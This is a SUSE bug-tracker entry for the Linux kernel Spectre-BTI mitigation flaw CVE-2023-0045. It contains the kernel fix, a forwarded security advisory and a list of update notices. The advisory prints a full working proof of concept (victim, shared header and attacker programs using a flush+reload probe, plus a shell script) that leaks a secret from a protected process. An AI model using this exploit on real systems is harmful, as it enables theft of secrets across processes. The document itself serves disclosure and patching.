Bugzilla – Bug 1207773
VUL-0: CVE-2023-0045: kernel: missing Flush IBP in ib_prctl_set
Last modified: 2024-06-25 17:26:49 UTC
from Boris Commit-ID: a664ec9158eeddd75121d39c9a0758016097fa96 Gitweb: https://git.kernel.org/tip/a664ec9158eeddd75121d39c9a0758016097fa96 Author: Rodrigo Branco <bsdaemon@google.com> AuthorDate: Tue, 03 Jan 2023 14:17:51 -06:00 Committer: Ingo Molnar <mingo@kernel.org> CommitterDate: Wed, 04 Jan 2023 11:25:32 +01:00 x86/bugs: Flush IBP in ib_prctl_set() We missed the window between the TIF flag update and the next reschedule. Signed-off-by: Rodrigo Branco <bsdaemon@google.com> Reviewed-by: Borislav Petkov (AMD) <bp@alien8.de> Signed-off-by: Ingo Molnar <mingo@kernel.org> Cc: <stable@vger.kernel.org> --- arch/x86/kernel/cpu/bugs.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c index d970ddb..bca0bd8 100644 --- a/arch/x86/kernel/cpu/bugs.c +++ b/arch/x86/kernel/cpu/bugs.c @@ -1981,6 +1981,8 @@ static int ib_prctl_set(struct task_struct *task, unsigned long ctrl) if (ctrl == PR_SPEC_FORCE_DISABLE) task_set_spec_ib_force_disable(task); task_update_spec_tif(task); + if (task == current) + indirect_branch_prediction_barrier(); break; default: return -ERANGE; ----- End forwarded message -----
From oss-sec: CVE-2023-0045: Linux Kernel: Bypassing Spectre-BTI User Space Mitigations From: Rafael Correa De Ysasi <rcorreadeysasi () chromium org> Date: Fri, 3 Feb 2023 13:11:01 -0500 Summary The Linux kernel does not correctly mitigate SMT attacks, as discovered through a strange pattern in the kernel API using STIBP as a mitigation[1 <https://docs.kernel.org/userspace-api/spec_ctrl.html>], leaving the process exposed for a short period of time after a syscall. The kernel also does not issue an IBPB immediately during the syscall. The ib_prctl_set [2 <https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/cpu/bugs.c#L1467>]function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update [3 <https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/process.c#L557>], but the IBPB is only issued on the next schedule, when the TIF bits are checked. This leaves the victim vulnerable to values already injected on the BTB, prior to the prctl syscall. The behavior is only corrected after a reschedule of the task happens. Furthermore, the kernel entrance (due to the syscall itself), does not issue an IBPB in the default scenarios (i.e., when the kernel protects itself via retpoline or eIBRS). Severity High - The inability to correctly mitigate SMT attacks, leaves the kernel exposed for an attacker to inject malicious code into the running kernel, which could lead to a complete compromise of the system. Proof of Concept To ensure this wasn't a measurement error, we created a simple POC. The victim code always executes asafe_function through a function pointer that is vulnerable to a spectre-BTI attack. The victim requests the kernel for protection using the prctl syscall (inside protect_me). The victim also loads a secret from a text file, showing that other syscalls don’t check the TIF bit or provoke a reschedule that would force an IBPB. //gcc -o victim victim.c -O0 -masm=intel -no-pie -fno-stack-protector #include "common.h" int main(int argc, char *argv[]) { setvbuf(stdout, NULL, _IONBF, 0); printf("running victim %s\n", argv[1]); //only call safe_function codePtr = safe_function; char secret[20]; char *sharedmem = open_shared_mem(); unsigned idx = string_to_unsigned(argv[1]); //call for prctl to protect this process protect_me(); //only then load the secret into memory load_secret(secret); for (int i = 0; i < 100; i++) { flush((char *)&codePtr); //this arguments are never used on safe_function, but they match the signature of spectre_gadget, that should never be called //Since prctl is called, it shouldn't be possible for an attacker to poison the BTB and leak the secret spec(&sharedmem[2000], secret, idx); } } Most of the libc functions were placed inside a common header between the attacker and the victim, so the spectre_gadget and spec functions share the same memory addresses on both victim and attacker (otherwise a .GOT entry is created and the addresses are changed). This is not a requirement and there are other ways to place the branches on the same addresses and mimic the victim context, but this method is the simplest. #include <stdlib.h> #include <sys/mman.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <sys/prctl.h> char unused[0x1000]; void (*codePtr)(char *, char *, unsigned idx); char unused2[0x1000]; // this function does nothing. Always called by the victim void safe_function(char *a, char *b, unsigned idx) { } // this function is never called by the victim void spectre_gadget(char *addr, char *secret, unsigned idx) { volatile char d; if ((secret[idx / 8] >> (idx % 8)) & 1) d = *addr; } // helper for better results probably not necessary but makes the tests easier void flush(char *adrs) { asm volatile( "clflush [%0] \n" : : "c"(adrs) :); } // This function is vulnerable to a spectre-BTI attack. void spec(char *addr, char *secret, unsigned idx) { for (register int i = 0; i < 30; i++) ; codePtr(addr, secret, idx); } // opens file as read only in memory to be used as side channel, but could be any other COW file like libc for example char *open_shared_mem() { int fd = open("sharedmem", O_RDONLY); char *res = (char *)mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0); // ensure page is on memory volatile char d = res[2100]; return res; } // load secret from file void load_secret(char *secret) { FILE *fp = fopen("secret.txt", "r"); fgets(secret, 20, (FILE *)fp); } // Calls prctl to protect the user against spectre-BTI attacks - https://docs.kernel.org/userspace-api/spec_ctrl.html void protect_me() { usleep(1000); //not needed but resets the available time on scheduler prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0); } // Utility. All utility functions are placed on common so the spec function matches the same address on both victim and attacker. This is not necessary but makes the tests easier unsigned string_to_unsigned(char *s) { return atoi(s); } The attack consists in poisoning the BTB by calling the spec function and making it branch to spectre_gadget instead of safe_function. After the training the victim process is created and it executes spec that mispredicts to spectre_gadget which should never be executed. The secret is leaked through a classic flush+reload side channel. //gcc -o attacker attacker.c -O0 -masm=intel -no-pie -fno-stack-protector #include "common.h" #define PRINTNUM 1000 unsigned probe(char *adrs) { volatile unsigned long time; asm __volatile__( " mfence \n" " lfence \n" " rdtsc \n" " lfence \n" " mov esi, eax \n" " mov eax,[%1] \n" " lfence \n" " rdtsc \n" " sub eax, esi \n" " clflush [%1] \n" " mfence \n" " lfence \n" : "=a"(time) : "c"(adrs) : "%esi", "%edx"); return time; } int main(int argc, char *argv[]) { //Make spec function confuse safe_function with spectre_gadget codePtr = spectre_gadget; char dummy; int hits = 0; int tries = 0; char *sharedmem = open_shared_mem(); setvbuf(stdout, NULL, _IONBF, 0); while (1) { //Inject the target in the BTB spec(&dummy, &dummy, 0); //Allow for victim to execute and misspredict to spectre_gadget usleep(1); //probe the 1-bit flush+reload side channel if (probe((char *)&sharedmem[2000]) < 0x90) { printf("+"); } } } Since the victim receives an argument that can be used to choose the bit to be leaked through the side channel, we can execute the victim process multiple times while the attacker is executing: taskset -c 0 ./attacker >> result.txt & for i in {0..144} do echo "Leaking bit $i... " echo -e -n "Leaking bit $i: " >> result.txt sleep .01 for j in {0..10} do taskset -c 0 ./victim $i >/dev/null done echo "" >> result.txt done python3 parseResult.py make clean echo -e "killing attacker" kill -9 $(pidof attacker) This leaves the following text file: Leaking bit 0: +++++++++++ Leaking bit 1: Leaking bit 2: Leaking bit 3: Leaking bit 4: Leaking bit 5: Leaking bit 6: ++++++++++ Leaking bit 7: Leaking bit 8: ++++++++ [...] Note that bit 0 and 6 are 1, therefore the first character must be 0x41(A). Parsing the file with a simple Python script shows:The secret leaked is: b'Asuper_secret_flag' which is the exact content present in secret.txt used by the victim. Changing the prctl call for seccomp to syscall(SYS_seccomp,SECCOMP_SET_MODE_STRICT,0,0); after loading the secret doesn't prevent the attack. This is expected since internally both use the same ib_prctl_set function to implement the mitigation. Further Analysis The current implementation of the prctl syscall for speculative control fails to protect the user against attackers executing before the mitigation. The seccomp mitigation also fails in this scenario. The patch that added support for the conditional mitigation via prctl (ib_prctl_set) dates back to the kernel 4.9.176. It appears to have been introduced on Nov 28, 2018 in the following commit: torvalds/linux@9137bb2 <https://github.com/torvalds/linux/commit/9137bb27e60e554dab694eafa4cca241fa3a694f> and the current __speculation_ctrl_update code that sets the MSRs, but without the immediate IBPB, was added on the same day in the following commit: torvalds/linux@01daf56 <https://github.com/torvalds/linux/commit/01daf56875ee0cd50ed496a09b20eb369b45dfa5>. This indicates that the issue has been present in the kernel for about 4 years. Mitigations For user-mode applications, a usleep after the prctl call is enough to force a reschedule and ensure the correct mitigation. One possible kernel patch for this attack is to issue the IBPB just after the STIBP is set, on __speculation_ctrl_update [3 <https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/process.c#L557>] or to call schedule(). After discussing with the Linux Kernel Security Team, that is what was decided, and the following commit has the fix: https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=a664ec9158eeddd75121d39c9a0758016097fa96 . Patch This was addressed in the following [commit].( https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/arch/x86/kernel/cpu/bugs.c?h=v6.1.9&id=e8377f0456fb6738a4668d4df16c13d7599925fd ) Timeline *Date reported*: 12/30/2022 *Date fixed*: 01/04/2023 *Date disclosed*: 02/03/2023
(In reply to Thomas Leroy from comment #1) > From oss-sec: > > CVE-2023-0045: Linux Kernel: Bypassing Spectre-BTI User Space Mitigations > From: Rafael Correa De Ysasi <rcorreadeysasi () chromium org> > Date: Fri, 3 Feb 2023 13:11:01 -0500 > Summary > > [...] > > *Date reported*: 12/30/2022 > *Date fixed*: 01/04/2023 > *Date disclosed*: 02/03/2023 This post is actually disputed by the reseacher. Here is the researcher's writeup: https://github.com/es0j/CVE-2023-0045
so just to be clear: - it is a security issue - it is lower severity as announced.
According to the Google advisory [0], the commit setting the MSR_IA32_SPEC_CTRL without immediately issuing IBPB is [1]. This commit is on the following branches, that will have to be fixed: - SLE15-SP4 - cve/linux-5.3 - cve/linux-4.12 stable and master already have the fix. [0] https://github.com/google/security-research/security/advisories/GHSA-9x5g-vmxf-4qj8 [1] https://github.com/torvalds/linux/commit/01daf56875ee0cd50ed496a09b20eb369b45dfa5
Pushed to: - stable (references update) - SLE15-SP4 - cve/linux-5.3 - cve/linux-4.12
SUSE-SU-2023:0488-1: An update that solves 11 vulnerabilities, contains two features and has 133 fixes can now be installed. Category: security (important) Bug References: 1166486, 1185861, 1185863, 1186449, 1191256, 1192868, 1193629, 1194869, 1195175, 1195655, 1196058, 1199701, 1203332, 1204063, 1204356, 1204662, 1205495, 1206006, 1206036, 1206056, 1206057, 1206224, 1206258, 1206363, 1206459, 1206616, 1206640, 1206677, 1206784, 1206876, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206885, 1206886, 1206887, 1206888, 1206889, 1206890, 1206893, 1206894, 1207010, 1207034, 1207036, 1207050, 1207125, 1207134, 1207149, 1207158, 1207184, 1207186, 1207188, 1207189, 1207190, 1207237, 1207263, 1207269, 1207328, 1207497, 1207500, 1207501, 1207506, 1207507, 1207588, 1207589, 1207590, 1207591, 1207592, 1207593, 1207594, 1207602, 1207603, 1207605, 1207606, 1207607, 1207608, 1207609, 1207610, 1207611, 1207612, 1207613, 1207614, 1207615, 1207616, 1207617, 1207618, 1207619, 1207620, 1207621, 1207622, 1207623, 1207624, 1207625, 1207626, 1207627, 1207628, 1207629, 1207630, 1207631, 1207632, 1207633, 1207634, 1207635, 1207636, 1207637, 1207638, 1207639, 1207640, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207649, 1207650, 1207651, 1207652, 1207653, 1207734, 1207768, 1207769, 1207770, 1207771, 1207773, 1207795, 1207842, 1207875, 1207878, 1207933, 1208030, 1208044, 1208085, 1208149, 1208153, 1208183, 1208428, 1208429 CVE References: CVE-2020-24588, CVE-2022-36280, CVE-2022-4382, CVE-2022-47929, CVE-2023-0045, CVE-2023-0122, CVE-2023-0179, CVE-2023-0266, CVE-2023-0590, CVE-2023-23454, CVE-2023-23455 Jira References: PED-3210, SLE-21132 Sources used: openSUSE Leap 15.4 (src): kernel-source-rt-5.14.21-150400.15.11.1, kernel-syms-rt-5.14.21-150400.15.11.1 SUSE Linux Enterprise Live Patching 15-SP4 (src): kernel-livepatch-SLE15-SP4-RT_Update_3-1-150400.1.3.1 SUSE Real Time Module 15-SP4 (src): kernel-source-rt-5.14.21-150400.15.11.1, kernel-syms-rt-5.14.21-150400.15.11.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0485-1: An update that solves six vulnerabilities, contains two features and has 53 fixes can now be installed. Category: security (important) Bug References: 1175995, 1186449, 1198971, 1202712, 1202713, 1203332, 1203693, 1204356, 1204514, 1204662, 1205149, 1205397, 1205495, 1206602, 1206635, 1206640, 1206641, 1206642, 1206643, 1206645, 1206646, 1206648, 1206649, 1206677, 1206698, 1206784, 1206855, 1206858, 1206873, 1206876, 1206877, 1206878, 1206880, 1206882, 1206883, 1206884, 1206885, 1206887, 1206888, 1206890, 1207036, 1207092, 1207093, 1207094, 1207097, 1207102, 1207103, 1207104, 1207107, 1207108, 1207134, 1207168, 1207186, 1207195, 1207237, 1207773, 1207795, 1207875, 1208108 CVE References: CVE-2022-36280, CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0590, CVE-2023-23454 Jira References: PED-1706, SLE-15608 Sources used: SUSE Linux Enterprise Real Time 12 SP5 (src): kernel-source-rt-4.12.14-10.115.1, kernel-syms-rt-4.12.14-10.115.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0634-1: An update that solves nine vulnerabilities, contains two features and has 56 fixes can now be installed. Category: security (important) Bug References: 1068032, 1175995, 1186449, 1194535, 1198971, 1201420, 1202195, 1202712, 1202713, 1203200, 1203332, 1203693, 1204356, 1204514, 1204662, 1205149, 1205397, 1205495, 1206602, 1206635, 1206640, 1206641, 1206642, 1206643, 1206645, 1206646, 1206648, 1206649, 1206664, 1206677, 1206698, 1206784, 1206855, 1206858, 1206873, 1206876, 1206877, 1206878, 1206880, 1206882, 1206883, 1206884, 1206885, 1206887, 1206888, 1206890, 1207092, 1207093, 1207094, 1207097, 1207102, 1207103, 1207104, 1207107, 1207108, 1207134, 1207186, 1207201, 1207237, 1207773, 1207795, 1207875, 1208108, 1208541, 1208570 CVE References: CVE-2017-5754, CVE-2021-4203, CVE-2022-2991, CVE-2022-36280, CVE-2022-4662, CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0590 Jira References: PED-1706, SLE-15608 Sources used: SUSE Linux Enterprise Live Patching 12-SP5 (src): kgraft-patch-SLE12-SP5_Update_40-1-8.3.1 SUSE Linux Enterprise Software Development Kit 12 SP5 (src): kernel-obs-build-4.12.14-122.150.1 SUSE Linux Enterprise High Performance Computing 12 SP5 (src): kernel-source-4.12.14-122.150.1, kernel-syms-4.12.14-122.150.1 SUSE Linux Enterprise Server 12 SP5 (src): kernel-source-4.12.14-122.150.1, kernel-syms-4.12.14-122.150.1 SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): kernel-source-4.12.14-122.150.1, kernel-syms-4.12.14-122.150.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0768-1: An update that solves 11 vulnerabilities and has five fixes can now be installed. Category: security (important) Bug References: 1186449, 1194535, 1201420, 1203331, 1203332, 1204356, 1204662, 1205711, 1207051, 1207773, 1207795, 1207845, 1207875, 1208700, 1208837, 1209188 CVE References: CVE-2021-4203, CVE-2022-2991, CVE-2022-36280, CVE-2022-38096, CVE-2022-4129, CVE-2023-0045, CVE-2023-0590, CVE-2023-0597, CVE-2023-1118, CVE-2023-23559, CVE-2023-26545 Sources used: SUSE Linux Enterprise Live Patching 15-SP1 (src): kernel-livepatch-SLE15-SP1_Update_38-1-150100.3.3.2 SUSE Linux Enterprise High Performance Computing 15 SP1 LTSS 15-SP1 (src): kernel-syms-4.12.14-150100.197.137.2, kernel-obs-build-4.12.14-150100.197.137.2, kernel-source-4.12.14-150100.197.137.2 SUSE Linux Enterprise Server 15 SP1 LTSS 15-SP1 (src): kernel-syms-4.12.14-150100.197.137.2, kernel-obs-build-4.12.14-150100.197.137.2, kernel-source-4.12.14-150100.197.137.2 SUSE Linux Enterprise Server for SAP Applications 15 SP1 (src): kernel-syms-4.12.14-150100.197.137.2, kernel-obs-build-4.12.14-150100.197.137.2, kernel-source-4.12.14-150100.197.137.2 SUSE CaaS Platform 4.0 (src): kernel-syms-4.12.14-150100.197.137.2, kernel-obs-build-4.12.14-150100.197.137.2, kernel-source-4.12.14-150100.197.137.2 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0778-1: An update that solves 11 vulnerabilities and has 10 fixes can now be installed. Category: security (important) Bug References: 1186449, 1203331, 1203332, 1204356, 1204662, 1207051, 1207773, 1207795, 1207845, 1207875, 1207878, 1208023, 1208153, 1208212, 1208700, 1208741, 1208813, 1208816, 1208837, 1208845, 1208971 CVE References: CVE-2022-36280, CVE-2022-38096, CVE-2023-0045, CVE-2023-0590, CVE-2023-0597, CVE-2023-1118, CVE-2023-22995, CVE-2023-23000, CVE-2023-23006, CVE-2023-23559, CVE-2023-26545 Sources used: SUSE Linux Enterprise Live Patching 15-SP2 (src): kernel-livepatch-SLE15-SP2_Update_34-1-150200.5.3.1 SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): kernel-default-base-5.3.18-150200.24.145.1.150200.9.69.1, kernel-obs-build-5.3.18-150200.24.145.1, kernel-source-5.3.18-150200.24.145.1, kernel-syms-5.3.18-150200.24.145.1 SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): kernel-default-base-5.3.18-150200.24.145.1.150200.9.69.1, kernel-obs-build-5.3.18-150200.24.145.1, kernel-source-5.3.18-150200.24.145.1, kernel-syms-5.3.18-150200.24.145.1 SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): kernel-default-base-5.3.18-150200.24.145.1.150200.9.69.1, kernel-obs-build-5.3.18-150200.24.145.1, kernel-source-5.3.18-150200.24.145.1, kernel-syms-5.3.18-150200.24.145.1 SUSE Enterprise Storage 7 (src): kernel-default-base-5.3.18-150200.24.145.1.150200.9.69.1, kernel-obs-build-5.3.18-150200.24.145.1, kernel-source-5.3.18-150200.24.145.1, kernel-syms-5.3.18-150200.24.145.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0780-1: An update that solves 12 vulnerabilities and has 13 fixes can now be installed. Category: security (important) Bug References: 1186449, 1195175, 1198438, 1203331, 1203332, 1204356, 1204662, 1206103, 1206351, 1207051, 1207575, 1207773, 1207795, 1207845, 1207875, 1208023, 1208153, 1208212, 1208700, 1208741, 1208776, 1208816, 1208837, 1208845, 1208971 CVE References: CVE-2022-36280, CVE-2022-38096, CVE-2023-0045, CVE-2023-0590, CVE-2023-0597, CVE-2023-1118, CVE-2023-22995, CVE-2023-22998, CVE-2023-23000, CVE-2023-23006, CVE-2023-23559, CVE-2023-26545 Sources used: SUSE Linux Enterprise Live Patching 15-SP3 (src): kernel-livepatch-SLE15-SP3_Update_30-1-150300.7.3.1 SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): kernel-obs-build-5.3.18-150300.59.115.2, kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1, kernel-syms-5.3.18-150300.59.115.1 SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): kernel-obs-build-5.3.18-150300.59.115.2, kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1, kernel-syms-5.3.18-150300.59.115.1 SUSE Linux Enterprise Real Time 15 SP3 (src): kernel-obs-build-5.3.18-150300.59.115.2, kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1, kernel-syms-5.3.18-150300.59.115.1 SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): kernel-obs-build-5.3.18-150300.59.115.2, kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1, kernel-syms-5.3.18-150300.59.115.1 SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): kernel-obs-build-5.3.18-150300.59.115.2, kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1, kernel-syms-5.3.18-150300.59.115.1 SUSE Manager Proxy 4.2 (src): kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1 SUSE Manager Retail Branch Server 4.2 (src): kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1 SUSE Manager Server 4.2 (src): kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1 SUSE Enterprise Storage 7.1 (src): kernel-obs-build-5.3.18-150300.59.115.2, kernel-source-5.3.18-150300.59.115.2, kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1, kernel-syms-5.3.18-150300.59.115.1 SUSE Linux Enterprise Micro 5.1 (src): kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1 SUSE Linux Enterprise Micro 5.2 (src): kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1 SUSE Linux Enterprise Micro for Rancher 5.2 (src): kernel-default-base-5.3.18-150300.59.115.2.150300.18.66.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0779-1: An update that solves 21 vulnerabilities and has 12 fixes can now be installed. Category: security (important) Bug References: 1186449, 1203331, 1203332, 1203693, 1204502, 1204760, 1205149, 1206351, 1206677, 1206784, 1207034, 1207051, 1207134, 1207186, 1207237, 1207497, 1207508, 1207560, 1207773, 1207795, 1207845, 1207875, 1207878, 1208212, 1208599, 1208700, 1208741, 1208776, 1208816, 1208837, 1208845, 1208971, 1209008 CVE References: CVE-2022-3606, CVE-2022-36280, CVE-2022-38096, CVE-2022-47929, CVE-2023-0045, CVE-2023-0179, CVE-2023-0266, CVE-2023-0590, CVE-2023-0597, CVE-2023-1076, CVE-2023-1095, CVE-2023-1118, CVE-2023-1195, CVE-2023-22995, CVE-2023-22998, CVE-2023-23000, CVE-2023-23004, CVE-2023-23006, CVE-2023-23559, CVE-2023-25012, CVE-2023-26545 Sources used: SUSE Real Time Module 15-SP3 (src): kernel-syms-rt-5.3.18-150300.121.1, kernel-source-rt-5.3.18-150300.121.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0796-1: An update that solves eight vulnerabilities and has 85 fixes can now be installed. Category: security (important) Bug References: 1166486, 1177529, 1203331, 1203332, 1204993, 1205544, 1206224, 1206232, 1206459, 1206640, 1206876, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206885, 1206886, 1206889, 1206894, 1207051, 1207270, 1207328, 1207588, 1207589, 1207590, 1207591, 1207592, 1207593, 1207594, 1207603, 1207605, 1207606, 1207607, 1207608, 1207609, 1207610, 1207613, 1207615, 1207617, 1207618, 1207619, 1207620, 1207621, 1207623, 1207624, 1207625, 1207626, 1207628, 1207630, 1207631, 1207632, 1207634, 1207635, 1207636, 1207638, 1207639, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207651, 1207653, 1207770, 1207773, 1207845, 1207875, 1208149, 1208153, 1208183, 1208212, 1208290, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208570, 1208607, 1208628, 1208700, 1208741, 1208759, 1208784, 1208787, 1209188 CVE References: CVE-2022-36280, CVE-2022-38096, CVE-2023-0045, CVE-2023-0461, CVE-2023-0597, CVE-2023-22995, CVE-2023-23559, CVE-2023-26545 Sources used: openSUSE Leap Micro 5.3 (src): kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3 openSUSE Leap 15.4 (src): kernel-obs-qa-5.14.21-150400.24.49.2, kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3, kernel-syms-5.14.21-150400.24.49.4, kernel-source-5.14.21-150400.24.49.4, kernel-obs-build-5.14.21-150400.24.49.3 SUSE Linux Enterprise Micro for Rancher 5.3 (src): kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3 SUSE Linux Enterprise Micro 5.3 (src): kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3 Basesystem Module 15-SP4 (src): kernel-source-5.14.21-150400.24.49.4, kernel-default-base-5.14.21-150400.24.49.3.150400.24.19.3 Development Tools Module 15-SP4 (src): kernel-syms-5.14.21-150400.24.49.4, kernel-source-5.14.21-150400.24.49.4, kernel-obs-build-5.14.21-150400.24.49.3 SUSE Linux Enterprise Live Patching 15-SP4 (src): kernel-livepatch-SLE15-SP4_Update_9-1-150400.9.3.3 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:0852-1: An update that solves nine vulnerabilities and has two fixes can now be installed. Category: security (important) Bug References: 1191881, 1194535, 1201420, 1203331, 1203332, 1205711, 1207051, 1207773, 1207795, 1208700, 1209188 CVE References: CVE-2021-4203, CVE-2022-2991, CVE-2022-36280, CVE-2022-38096, CVE-2022-4129, CVE-2023-0045, CVE-2023-0590, CVE-2023-23559, CVE-2023-26545 Sources used: SUSE OpenStack Cloud 9 (src): kernel-source-4.12.14-95.120.4, kernel-syms-4.12.14-95.120.4 SUSE OpenStack Cloud Crowbar 9 (src): kernel-source-4.12.14-95.120.4, kernel-syms-4.12.14-95.120.4 SUSE Linux Enterprise Live Patching 12-SP4 (src): kgraft-patch-SLE12-SP4_Update_34-1-6.3.4 SUSE Linux Enterprise Server for SAP Applications 12 SP4 (src): kernel-source-4.12.14-95.120.4, kernel-syms-4.12.14-95.120.4 SUSE Linux Enterprise Server 12 SP4 ESPOS 12-SP4 (src): kernel-source-4.12.14-95.120.4, kernel-syms-4.12.14-95.120.4 SUSE Linux Enterprise Server 12 SP4 LTSS 12-SP4 (src): kernel-source-4.12.14-95.120.4, kernel-syms-4.12.14-95.120.4 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:1608-1: An update that solves 24 vulnerabilities and has 112 fixes can now be installed. Category: security (important) Bug References: 1166486, 1177529, 1193629, 1197534, 1197617, 1198438, 1200054, 1202353, 1202633, 1203200, 1203331, 1203332, 1204363, 1204993, 1205544, 1205846, 1206103, 1206224, 1206232, 1206459, 1206492, 1206493, 1206640, 1206824, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206886, 1206894, 1206935, 1207036, 1207050, 1207051, 1207125, 1207270, 1207328, 1207529, 1207560, 1207588, 1207590, 1207591, 1207592, 1207593, 1207594, 1207603, 1207605, 1207606, 1207608, 1207609, 1207613, 1207615, 1207617, 1207618, 1207619, 1207620, 1207621, 1207623, 1207624, 1207625, 1207626, 1207630, 1207631, 1207632, 1207634, 1207635, 1207636, 1207638, 1207639, 1207640, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207649, 1207650, 1207651, 1207652, 1207653, 1207768, 1207770, 1207771, 1207773, 1207795, 1207845, 1207875, 1208149, 1208153, 1208179, 1208183, 1208212, 1208290, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208542, 1208570, 1208598, 1208599, 1208601, 1208605, 1208607, 1208628, 1208700, 1208741, 1208759, 1208776, 1208777, 1208784, 1208787, 1208816, 1208829, 1208837, 1208843, 1208848, 1209008, 1209159, 1209188, 1209256, 1209258, 1209262, 1209291, 1209436, 1209457, 1209504, 1209572 CVE References: CVE-2022-3523, CVE-2022-36280, CVE-2022-38096, CVE-2023-0045, CVE-2023-0122, CVE-2023-0461, CVE-2023-0590, CVE-2023-0597, CVE-2023-1075, CVE-2023-1076, CVE-2023-1078, CVE-2023-1095, CVE-2023-1118, CVE-2023-22995, CVE-2023-22998, CVE-2023-23000, CVE-2023-23001, CVE-2023-23004, CVE-2023-23454, CVE-2023-23455, CVE-2023-23559, CVE-2023-25012, CVE-2023-26545, CVE-2023-28328 Sources used: openSUSE Leap 15.4 (src): kernel-syms-azure-5.14.21-150400.14.40.1, kernel-source-azure-5.14.21-150400.14.40.1 Public Cloud Module 15-SP4 (src): kernel-syms-azure-5.14.21-150400.14.40.1, kernel-source-azure-5.14.21-150400.14.40.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:1710-1: An update that solves 19 vulnerabilities and has 111 fixes can now be installed. Category: security (important) Bug References: 1166486, 1177529, 1193629, 1197534, 1197617, 1198438, 1202353, 1202633, 1203200, 1203331, 1203332, 1204363, 1204993, 1205544, 1205846, 1206103, 1206224, 1206232, 1206459, 1206492, 1206493, 1206640, 1206824, 1206876, 1206877, 1206878, 1206880, 1206881, 1206882, 1206883, 1206884, 1206885, 1206886, 1206889, 1206894, 1206935, 1207051, 1207270, 1207328, 1207529, 1207560, 1207588, 1207589, 1207590, 1207591, 1207592, 1207593, 1207594, 1207603, 1207605, 1207606, 1207607, 1207608, 1207609, 1207610, 1207613, 1207615, 1207617, 1207618, 1207619, 1207620, 1207621, 1207623, 1207624, 1207625, 1207626, 1207628, 1207630, 1207631, 1207632, 1207634, 1207635, 1207636, 1207638, 1207639, 1207641, 1207642, 1207643, 1207644, 1207645, 1207646, 1207647, 1207648, 1207651, 1207653, 1207770, 1207773, 1207845, 1207875, 1208149, 1208153, 1208179, 1208183, 1208212, 1208290, 1208420, 1208428, 1208429, 1208449, 1208534, 1208541, 1208570, 1208598, 1208599, 1208601, 1208603, 1208605, 1208607, 1208628, 